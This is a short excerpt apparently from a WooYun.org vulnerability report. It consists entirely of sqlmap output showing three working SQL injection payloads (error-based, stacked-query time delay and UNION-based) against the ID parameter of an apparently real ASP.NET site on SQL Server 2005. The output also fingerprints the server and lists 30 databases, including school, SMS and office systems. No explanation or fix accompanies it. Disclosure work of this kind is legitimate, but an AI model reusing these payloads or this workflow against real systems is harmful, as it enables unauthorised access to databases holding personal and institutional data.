WooYun.org

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ID (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ID=2' AND 6410=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6410=6410) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(113))) AND 'rFCK'='rFCK
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: ID=2';WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: ID=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(107)+CHAR(98)+CHAR(113)+CHAR(83)+CHAR(121)+CHAR(115)+CHAR(116)+CHAR(86)+CHAR(113)+CHAR(110)+CHAR(113)+CHAR(70)+CHAR(121)+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(113)-- 
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [30]:
[*] acddyn
[*] aspnetdb
[*] ASPState
[*] CourseLib
[*] eblog
[*] EofficeBBS
[*] EofficeII
[*] eschool20141201
[*] eschool_20150519
[*] etraining
[*] fax_membership
[*] master
[*] model
[*] msdb
[*] netschool
[*] OperationsManager
[*] Portal
[*] rtcab
[*] rtcconfig
[*] rtcdyn
[*] ScoreSearch
[*] SmsGateWay
[*] SUSDB
[*] tempdb
[*] UnionstarsSms
[*] US_SMS
[*] Videoshow
[*] XBeblog
[*] XBETraining
[*] XBnetschool